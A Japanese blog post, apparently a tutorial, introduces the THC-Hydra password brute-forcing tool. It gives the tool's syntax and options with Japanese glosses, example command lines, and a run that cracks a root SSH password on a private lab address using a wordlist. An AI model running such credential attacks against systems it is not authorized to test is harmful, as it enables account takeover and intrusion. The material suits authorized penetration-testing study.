medusa に比べて古くから使用されている。
ssh は medusa が良いようだが、ftp には hydra がよさそうなど相性が多少なりあるようなので、両方使用できるほうがいい。
使用方法としては以下のとおり。medusa は hydra から派生したらしいのでオプションの使い方が似ている。
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]オプションは以下のとおり。
使いそうな部分を一部日本語で。
Options: -R restore a previous aborted/crashed session -S perform an SSL connect -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE 小文字ならユーザ直接指定、大文字ならユーザ名が書いてあるファイル指定 -p PASS or -P FILE 小文字ならパスワード直接指定、大文字ならファイル指定 -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help -e nsr n ならパスワードなし、s ならユーザ名をパスワードとして設定、r はユーザ名を逆にする -u loop around users, not passwords (effective! implied with -x) -C FILE colon separated "login:pass" format, instead of -L/-P options -M FILE list of servers to be attacked in parallel, one entry per line -o FILE write found login/password pairs to FILE instead of stdout -f / -F クラックできたときの処理、小文字ならホスト単位で終了、大文字なら全部終了 -t TASKS run TASKS number of connects in parallel (per host, default: 16) -w / -W TIME waittime for responses (32s) / between connects per thread -4 / -6 prefer IPv4 (default) or IPv6 addresses -v / -V verbose mode / show login+pass combination for each attempt -U service module usage details server the target server (use either this OR the -M option) service the service to crack. Supported protocols: cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh svn teamspeak telnet[s] vmauthd vnc xmpp OPT some service modules need special input (use -U to see module help) Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.使用例は以下のとおり。
Examples: hydra -l john -p doe 192.168.0.1 ftp hydra -L user.txt -p defaultpw -S 192.168.0.1 imap PLAIN hydra -l admin -P pass.txt http-proxy://192.168.0.1 hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/DIGEST-MD5実際に使用してみると以下のようになる。
root@bt:~# hydra -l root -P passwords.txt 192.168.1.100 ssh Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2013-01-28 18:36:47 [DATA] 16 tasks, 1 server, 503 login tries (l:1/p:503), ~31 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: 192.168.1.100 login: root password: toor [STATUS] attack finished for 192.168.1.100 (waiting for children to finish) 1 of 1 target successfuly completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2013-01-28 18:36:52
0 件のコメント:
コメントを投稿